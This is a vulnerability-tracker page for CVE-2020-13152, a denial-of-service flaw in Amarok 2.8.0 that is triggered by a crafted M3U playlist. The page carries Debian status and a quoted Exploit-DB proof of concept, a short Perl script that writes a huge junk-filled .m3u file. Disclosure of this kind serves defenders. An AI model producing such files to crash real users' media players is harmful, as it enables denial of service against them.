CVE-2020-13152
Description
A remote user can create a specially crafted M3U file, media playlist file that when loaded by the target user, will trigger a memory leak, whereby Amarok 2.8.0 continue to waste resources over time, eventually allows attackers to cause a denial of service.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Amarok 2.8.0 - Denial-of-Service
# Exploit Title: Amarok 2.8.0 - Denial-of-Service
# Date: 1 November 2020
# Exploit Author: FishballAndMeatball
# Vendor Homepage: https://amarok.kde.org/
# Software link: https://community.kde.org/Amarok/GettingStarted/Download
# Version: Amarok 2.8.0
# Tested on: Windows 10, Windows 7, Windows XP
# CVE: CVE-2020-13152
my $file= “test_big.m3u“;
my $junk= “\x41” x 6368545;
open($FILE,”>$file”);
print $FILE “$junk”;
close($FILE);
print “m3u File Created successfully\n”;OS impact
Debian Affected 3 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Affected | — |
| sid | Affected | — |
| forky | Affected | — |
References
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.